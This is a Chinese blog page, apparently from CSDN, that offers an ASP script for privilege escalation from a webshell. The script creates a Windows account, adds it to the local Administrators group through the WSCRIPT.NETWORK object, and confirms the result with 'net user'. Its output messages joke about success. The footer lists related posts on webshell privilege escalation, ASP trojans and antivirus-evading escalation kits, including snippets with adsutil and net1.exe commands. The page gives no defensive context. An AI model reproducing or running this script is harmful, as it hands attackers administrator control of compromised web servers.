用ASP代码添加超级用户——asp提权时用

最新推荐文章于 2022-04-19 08:22:39 发布
最新推荐文章于 2022-04-19 08:22:39 发布
阅读量551 收藏
点赞数
文章标签: asp input user action 脚本 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/inject2006/article/details/1789591
版权
<head>.network对象脚本权限提升漏洞利用工具</head>
<form action="useradd.asp" method=post>
用户:<input name="username" type="text" value="kevin1986"><br>
密码:<input name="passwd" type="password"><br>
<input type="submit" Value="添 加">
</form>

<%@codepage=936%>
<%on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")<>"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.CreateObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.Create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
if err then
response.write "哎~~今天你还是别买6+1了&hellip;&hellip;省下2元钱买瓶可乐也好&hellip;&hellip;"
else
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登录")>0 then
response.write "虽然没有错误,但是好象也没建立成功.你一定很郁闷吧"
else
Response.write "OMG!"&username&"帐号居然成了!这可是未知漏洞啊.5,000,000RMB是你的了"
end if
end if
else
response.write "请输入输入用户名"
end if
end if
%>

 
inject2006
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
ASP.NET源码——ASP.NET高亮代码.zip
10-10
ASP.NET源码——ASP.NET高亮代码.zip
aspen中再沸器模拟_aspen换热器的模拟计算
weixin_42674361的博客
01-13 2768
ASPENPLUS ASPEN PLUS 工过程模拟工过程模拟 22页页 一、换热器模块 1.1模块类型模型 说明 目的 用于 Heater 加热器或冷却器 确定出口物流的热和 相态条件 加热器、冷却器、冷凝 HeatX两股物流的换热器 在两个物流之间换热 两股物流的换热器。当 知道几何尺寸时换热器如何用aspen优化,核算 管壳式换热器 MHeatX 多股物流的换热器 在多股物流之间换热 多股热...
ASP木马提升权限的N种方法
fireman
07-19 2757
ASP木马提升权限的N种方法Submitted by cooldiyer on 2006, July 6, 11:53 AM. 技术一、Serv-U提权    OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,记得有次看到SERV-U有默认的用户名和密码,但是监听的端口是43958,而且是只有本地才能访问的,但是我们有端口转发工具的啊,不怕。先看看他的SERV-U的版本是多少,t
渗透之——ASP Web提权
冰河的专栏
12-31 5262
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85475585 【 web提权 】 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上...
IDEA识别不了导入SpringBoot项目
m0_67392010的博客
04-19 2668
idea导入springboot项目后,run键是灰色的,不能点击运行。 1、方法是:在project structure中将对应的目录mark as为想要的类型之后,可以右键正常运行。或者右键pom.xml选择add as a maven。然后等待添加依赖、插件。 2、如果pom.xml依赖配置出现红色,快捷键ALT+ENTER,更新配置 3、结果 参考:https://www.imooc.com/qadetail/278215 ...
webshell提权asp木马提权
weixin_34101784的博客
11-12 880
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆 2.C:\WINNT\system3...
asp提升权限技巧一则
weixin_33866037的博客
11-24 103
asp木马一直是搞脚本的朋友喜欢使用的工具之一,但由于它的权限一般都比较低(一般是IWAM_NAME权限),所以大家想出了各种方法来提升它的权限,比如说通过asp木马得到mssql数据库的权限,或拿到ftp的密码信息,又或者说是替换一个服务程序。而我今天要介绍的技巧是利用一个vbs文件来提升asp木马的权限,代码如下asp木马一直是搞脚本的朋友喜欢使用的...
ASP大马、提权专用、超大权限。{强烈推荐}
06-14
ASP大马、提权专用、超大权限。{强烈推荐}
ASP超强提权免杀珍藏版.asp
10-10
mNametitle ="超强提权免杀珍藏版" Copyright=" 免杀珍藏版 " SItEuRl="http://caidaome.com/" bg ="http://www.baidu/newsjpg/0.jpg" ysjb=true htp="http://127.0.0.1" durl="http://caidaome.com/" Response.Buffer =true BodyColor="#f8f47e" FontColor="#f8f47e" LinkColor="#f8f47e"
asp脚本提权轻松拿下服务器.rar
12-28
WEBSHELL下能轻松拿下服务器
asp提权工具(免杀2010-3-21)
03-23
asp提权工具(免杀2010-3-21),压缩cmd跟免杀的巴西烤肉
ASP超强提权免杀珍藏版.rar
05-29
ASP超强提权免杀珍藏版.rar
asp.dll提权(珍藏)
10-18
目的:提升asp木马的权限,留做后门
2008服务器提权专用版.asp
09-24
2008服务器提权专用版.asp
ASP网站实例开发源码——行业网站系统源代码.zip
10-18
ASP网站实例开发源码——行业网站系统源代码.zip
ASP网站实例开发源码——行业网站系统源代码.rar
10-18
ASP网站实例开发源码——行业网站系统源代码.rar
ASP网站实例开发源码——商务网站系统源代码.rar
10-18
ASP网站实例开发源码——商务网站系统源代码.rar
提升asp.dll权限提权方法
jihaichen520的博客
05-11 390
1)查看有特权的dll文件: 命令为:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 2)将asp.dll加入系统权限的列表cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\...
asp代码如何实现并添加注释
最新发布
05-18
ASP代码添加注释非常简单,只需要在注释内容前面加上 "<!--",在注释内容后面加上 "-->" 即可。例如: ``` <!-- 这是一个注释 --> ' 这是ASP代码 Response.Write("Hello World!") %> ``` 在上面的例子中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

inject2006

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值